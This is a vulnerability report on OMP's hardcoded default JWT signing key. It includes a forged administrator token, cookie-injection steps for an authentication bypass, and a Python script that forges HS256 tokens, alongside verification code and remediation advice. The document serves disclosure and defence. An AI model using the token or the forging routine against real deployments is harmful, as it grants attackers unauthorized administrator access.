This issue is submitted for CVE assignment.
A vulnerability has been identified in OMP due to the use of a hardcoded default SECRET_KEY in its configuration. Specifically, the key is defined in the application settings file, so every deployment that keeps the value shipped in the public repository shares the same secret.
The application relies on this SECRET_KEY to sign the JSON Web Tokens (JWT) it uses for authentication and authorization. Because the key is public and static, anyone who knows it can mint a token with arbitrary claims (for example user_id 1 / username admin) that the server accepts as genuine. No credentials or prior access are required: the attacker only needs the key from the repository and the claim layout shown in the reproduction below.
Additionally, because the session cookie carries that same JWT, the weak secret lets an attacker generate or modify authentication cookies directly, giving unauthorized access to the management interface.
Impact:
Successful exploitation of this vulnerability allows unauthenticated attackers to:
• Bypass authentication controls
• Escalate privileges to administrator level
• Access sensitive system data and management functions
This vulnerability has been assigned the identifier CNVD-2026-06597 and has been officially included in the China National Vulnerability Database (CNVD).
Steps to Reproduce
- Use the default SECRET_KEY from the repository to generate an HS256 JWT whose payload names the administrator account, such as:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZW1haWwiOiJhZG1pbkBjbG91ZHdpc2UuY29tIn0.ZA499RlITPrHcrI7OLzUH_DDca5vW3mD7e4CUQrHqRs
(the payload decodes to {"user_id":1,"username":"admin","email":"admin@cloudwise.com"})
- Store the token in the browser as a cookie named jwtToken
- Refresh the page; the request is accepted as the administrator and the administrative backend is reachable without logging in.
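The following script is an added illustration for this report, not code from OMP or from the reporter. It shows, with only the Python standard library, the three things the steps above rely on: decoding the reported token's claims without a key, forging an HS256 token for the same claims once the signing secret is known, and the verification routine an operator can run against a live token to test whether it was signed with a known default. The actual default SECRET_KEY from the OMP repository is deliberately not reproduced here; `ASSUMED_DEFAULT_KEYS` and `CONSTRUCTED_SECRET` are placeholders.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Token quoted in the reproduction steps above.
REPORTED_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZW1haWwiOiJhZG1pbkBjbG91ZHdpc2UuY29tIn0."
    "ZA499RlITPrHcrI7OLzUH_DDca5vW3mD7e4CUQrHqRs"
)

# Placeholders: the real repository default is not reproduced in this example.
ASSUMED_DEFAULT_KEYS = ["django-insecure-placeholder", "changeme"]
CONSTRUCTED_SECRET = "constructed-test-secret"


def b64url_encode(raw: bytes) -> str:
    """JWT uses unpadded base64url."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_unverified(token: str) -> tuple:
    """Header and payload are only encoded, not encrypted: anyone can read them."""
    header_b64, payload_b64, _sig_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def forge_hs256(secret: str, payload: dict) -> str:
    """Mint a token the server will accept if `secret` is its SECRET_KEY.

    Compact JSON with this key order reproduces the exact header and payload
    segments of the reported token; only the signature depends on the secret.
    """
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, payload)
    )
    sig = hmac.new(secret.encode("utf-8"), signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Return the claims if the token is a valid HS256 token under `secret`, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
    except (ValueError, json.JSONDecodeError):
        return None
    # Pin the algorithm: never let the token tell the verifier how to verify it.
    if header.get("alg") != "HS256":
        return None
    signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    expected = hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def signed_with_any(token: str, candidates: list) -> Optional[str]:
    """Operator check: which candidate secret, if any, validates this token?

    Run this against a token issued by your own deployment. A hit means the
    instance still signs with a known default and every session is forgeable.
    """
    for candidate in candidates:
        if verify_hs256(token, candidate) is not None:
            return candidate
    return None


if __name__ == "__main__":
    header, claims = decode_unverified(REPORTED_TOKEN)
    print("reported token header:", header)
    print("reported token claims:", claims)
    forged = forge_hs256(CONSTRUCTED_SECRET, claims)
    print("forged under constructed secret:", forged)
    print("verifies with right secret:", verify_hs256(forged, CONSTRUCTED_SECRET) == claims)
    print("verifies with wrong secret:", verify_hs256(forged, "other") is not None)
    print("reported token signed with an assumed default:",
          signed_with_any(REPORTED_TOKEN, ASSUMED_DEFAULT_KEYS))
```

The fix on the application side is to stop shipping a usable SECRET_KEY at all: read it from the environment or a secrets store at start-up and refuse to boot when it is absent, and generate a fresh random value per deployment. Note that rotating the key invalidates every token signed under the old one, so existing sessions will be logged out, which is the intended outcome here. Operators who cannot patch immediately can at least run `signed_with_any` against a token from their own instance to confirm whether the default is still in use.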